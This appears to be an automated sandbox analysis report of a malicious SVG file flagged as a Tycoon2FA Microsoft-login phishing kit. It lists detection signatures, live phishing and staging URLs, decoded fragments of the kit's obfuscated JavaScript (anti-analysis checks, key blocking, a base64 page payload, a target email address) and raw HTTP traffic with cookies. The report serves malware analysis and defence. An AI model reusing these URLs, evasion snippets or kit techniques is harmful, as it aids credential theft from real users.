Edit tour

Windows Analysis Report
RECIPIENT_DOMAIN_NAME.svg

Overview

General Information

Sample name:RECIPIENT_DOMAIN_NAME.svg
Analysis ID:1647451
MD5:3358707fb8c23df0f94340e55f4adbbf
SHA1:7a9ee94f6ea33b5a08a278d102137dd9b516fde2
SHA256:59b120281e5c3d6f0fe25e70ae38e9bb3f116ced8cfddb1dd5667e33e447f4c4
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\RECIPIENT_DOMAIN_NAME.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2064,i,6778308183566973990,13809267106172008317,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
RECIPIENT_DOMAIN_NAME.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      0.0.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        0.1.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.1.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            0.0.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 15 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'iy8se.zvptaird.ru' does not match the legitimate domain for Microsoft., The URL has a suspicious structure with an unusual domain extension '.ru' which is not typically associated with Microsoft., The URL contains random characters and does not resemble any known Microsoft subdomains or services., The email domain 'ocsoft.com' in the input fields does not match the Microsoft domain, which could indicate a phishing attempt. DOM: 1.3.pages.csv
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.5..script.csv, type: HTML
              Source: Yara matchFile source: 1.20..script.csv, type: HTML
              Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.4.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.9.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: 0.5..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iy8se.zvptaird.ru/UKcxuUr/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 0.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iy8se.zvptaird.ru/UKcxuUr/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and collect sensitive information, which is a clear indication of malicious intent.
              Source: 0.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iy8se.zvptaird.ru/UKcxuUr/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code and the presence of a debugger-related function suggest malicious intent. Additionally, the script appears to be checking for the presence of web driver or headless browser environments, which is a common technique used by malware to detect and evade analysis. Overall, the combination of these factors indicates a high-risk script that should be treated with caution.
              Source: 1.11..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uy... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, blocks common keyboard shortcuts, and redirects the user to an external domain. Additionally, it prevents the user from copying text from the page. These behaviors are highly suspicious and indicate a potentially malicious intent, warranting a high-risk score.
              Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uy... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of browser automation tools, redirects to a suspicious domain, and implements a keylogger-like functionality to intercept various keyboard shortcuts. Additionally, the script uses obfuscated code, which further increases the risk. Overall, this script demonstrates a high level of malicious intent and poses a significant security risk.
              Source: 1.15..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uy... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution via `eval()` and potential data exfiltration through obfuscated URLs and domains. The use of `atob()` to decode the script and the presence of encrypted data handling functions further raise concerns about the script's intent. Overall, the combination of these factors suggests a high-risk, potentially malicious script that requires further investigation.
              Source: Yara matchFile source: RECIPIENT_DOMAIN_NAME.svg, type: SAMPLE
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: Number of links: 0
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://iy8se.zvptaird.ru/UKcxuUr/#Mtroy.tiegs@ocsofl.comHTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function FopCqaTliM(event) { co...
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: Title: Continue To Account Protection does not match URL
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: Invalid link: Terms of use
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: Invalid link: Privacy & cookies
              Source: https://iy8se.zvptaird.ru/UKcxuUr/HTTP Parser: function aepzwejskc(){kaegpitsrq = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+rwr1vmlzaw9uic0gvhjhbnnmb3jtaw5nievkdwnhdglvbjwvdgl0bgu+ciagphn0ewxlpgogicagym9kesb7ciagicagigzvbnqtzmftawx5oianu2vnb2ugvuknlcbuywhvbwesiedlbmv2yswgvmvyzgfuyswgc2fucy1zzxjpzjskicagicagbwfyz2luoiawowogicagicbwywrkaw5noiawowogicagicbiywnrz3jvdw5klwnvbg9yoiajzjlmowy5owogicagicbjb2xvcjogizmzmzskicagih0kicagighlywrlcib7ciagicagigjhy2tncm91bmq6igxpbmvhci1ncmfkawvudcgxmzvkzwcsicm2ytexy2isicmyntc1zmmpowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzognjbwecaymhb4owogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogm3jlbtskicagicagzm9udc13zwlnahq6igjvbgq7ciagicb9ciagicbozwfkzxigccb7ciagicagigzvbnqtc2l6ztogms4ycmvtowogicagicbtyxjnaw4tdg9woiaxmhb4owogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogcmdiysgyntusidi1nswgmju1lcawljkpowogi...
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "m4hvfv";var emailcheck = "troy.tiegs@ocsofl.com";var webname = "rtrim(/web8/, '/')";var urlo = "/gwhj3okkohv2tq5vlatsgoer8pozdgx6oyqyv6rpahw6p7tyxe";var gdf = "/ijwqpim9xq2kl2hfgkjyz27xynhzdw0izkfab111";var odf = "/ijyi1eta9vbprvt3lndhnmsxvwftyzmwqlm43wxzvab642";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match...
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: <input type="password" .../> found
              Source: https://iy8se.zvptaird.ru/UKcxuUr/#Mtroy.tiegs@ocsofl.comHTTP Parser: No favicon
              Source: https://iy8se.zvptaird.ru/UKcxuUr/#Mtroy.tiegs@ocsofl.comHTTP Parser: No favicon
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: No favicon
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: No <meta name="author".. found
              Source: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.29.234:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.248:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.16:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.85.149:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49799 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 0MB later: 37MB
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /UKcxuUr/ HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/UKcxuUr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InQ4ZEdwQkF0R0xUUmNkRVhCNy9GOGc9PSIsInZhbHVlIjoiUHZPRFZrQ3RSUzFZeXJvUlVIL29QQ0pRMVhsUEQxUGppcjJScG8yKzdjcUJZQWU1cUpWN0ljM1hPOUJvbTQ3VWliNWt0eXNOQThRRnFBUzFWSklRVGVSUUM4UHRkWjc4dXJDanpOQVE1NUorME4weGU2Z2JpSk1RczYyT2t4QXAiLCJtYWMiOiIzZmMzNDFjYzVhMTMzODFhNWZiNmRlZWFiMmYzZTAyMDU2OGE3OGMwY2Y0YmFhMDJiMThhMGFkZWNjNjVjNzBlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdNU1hkRjVwSVJsQkJuRlZ5NkFBVVE9PSIsInZhbHVlIjoiMExPTXhycUM0VUhsNDdvaWw3Z3BuL0R2WXBESjBTM3hCSXI2RnBVaFZ4R1M2ZG9OK0dWN0tFMkgwYW1HZ3ZBZUh4aVRENnJwMzBMcmd3azBVMnN4dnBNalZYTmx6YkNUWG9SdGxSQWhqMVhVOVk1YnhJbGplVllLd0xvbys4Y2kiLCJtYWMiOiJjMDFkOTA2NGJjOGMxNzBmMTE2OWJiY2UwOGJjMmYyOWJmNjczNTU5MzJiMTE2ZmI5NzU3ZTExYTEzY2IwYmQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /jawari!upw23 HTTP/1.1Host: 214w.hxnywi.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://iy8se.zvptaird.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jawari!upw23 HTTP/1.1Host: 214w.hxnywi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jawari!upw23 HTTP/1.1Host: 214w.hxnywi.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://iy8se.zvptaird.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jawari!upw23 HTTP/1.1Host: 214w.hxnywi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /UKcxuUr/ HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://iy8se.zvptaird.ru/UKcxuUr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjVpNGlPVzJXcFJOWnNXZ3oya2h5eHc9PSIsInZhbHVlIjoiOCtIeDJiUDN0bUIrbTZ2dnhoNEhFR0JZV1pFdU1wYS9QSUwrMWI1VHgwWEtXSXZXcWxNeE4rUkdsaS9XWlAzU3VjNDlVRGtsSllpaEU4eDVVZUg0YmZQRDhuWHlFN295dk4ySWRQelNXR0tRSjJPYjgvcklLU0lqSlBtcVEvNFYiLCJtYWMiOiIwNjQ1YjA1Zjk0Mzk4OWQwOWE2YzFlMmI2M2E2ZjRhZGU4NjBmOTFmZjU4NzU1YmU5Y2JjOGVjNDBjMTIyMzdjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjduWGN3QWp4ellZRHRTQ08vVTk0Rmc9PSIsInZhbHVlIjoiRHFKWG5Xa0NiWEFTR2F0dnVReFRsUUpCYzFpUnlhdUpONGJORHFwbVArRXRoc0J6aWc5RzNiU3Rpc3BHdGdZQUZoYVVNSVlDa0RTSWdKUHBKSUhmUjRMMUdFdEREaWZJZXRFR0dFNEczRDlrNWloNmlmQjcvbDcrd21wWlBJOWciLCJtYWMiOiJiZGRmMDk1NjlhZmY1ZDlkNWQ3MzdmMTQwNTFhNzI2NzhmMzVjZjk1YmYzNDY1YWE0ZmFjNTUxYzhkNmZlZWM2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fqrVzJ7QK65jRHLycjIYeEjqknYSpo HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjVpNGlPVzJXcFJOWnNXZ3oya2h5eHc9PSIsInZhbHVlIjoiOCtIeDJiUDN0bUIrbTZ2dnhoNEhFR0JZV1pFdU1wYS9QSUwrMWI1VHgwWEtXSXZXcWxNeE4rUkdsaS9XWlAzU3VjNDlVRGtsSllpaEU4eDVVZUg0YmZQRDhuWHlFN295dk4ySWRQelNXR0tRSjJPYjgvcklLU0lqSlBtcVEvNFYiLCJtYWMiOiIwNjQ1YjA1Zjk0Mzk4OWQwOWE2YzFlMmI2M2E2ZjRhZGU4NjBmOTFmZjU4NzU1YmU5Y2JjOGVjNDBjMTIyMzdjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjduWGN3QWp4ellZRHRTQ08vVTk0Rmc9PSIsInZhbHVlIjoiRHFKWG5Xa0NiWEFTR2F0dnVReFRsUUpCYzFpUnlhdUpONGJORHFwbVArRXRoc0J6aWc5RzNiU3Rpc3BHdGdZQUZoYVVNSVlDa0RTSWdKUHBKSUhmUjRMMUdFdEREaWZJZXRFR0dFNEczRDlrNWloNmlmQjcvbDcrd21wWlBJOWciLCJtYWMiOiJiZGRmMDk1NjlhZmY1ZDlkNWQ3MzdmMTQwNTFhNzI2NzhmMzVjZjk1YmYzNDY1YWE0ZmFjNTUxYzhkNmZlZWM2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /UKcxuUr/ HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://iy8se.zvptaird.ru/UKcxuUr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNvd0lTNTdGc2VUa0pTblpZUS9leUE9PSIsInZhbHVlIjoiTWEyc0ZUVGZmUTlnMjczMVRwOFBvbzdnVE1DWkdvbEw0K0hwZFovMUUvOERpQitmOHg1NzFJRUV0ZXZTd2N5VW9kVjAxb1p4bkE0Q0xmWXRIeTVhQk5nRk9wamdacjRrdmgvcjluc0FVYjA3K1lYb3NCOWJmZ2x4TmtIOVQ1eGMiLCJtYWMiOiIxYjU3ZTAxMGY0ZWRlMTc1N2U5ZmY2NmFhZDliZjVkY2M0ODQzODQ5NDg3ODJhMTk5NWI3MzA1ZWQyYTk3ZTkwIiwidGFnIjoiIn0%3D; 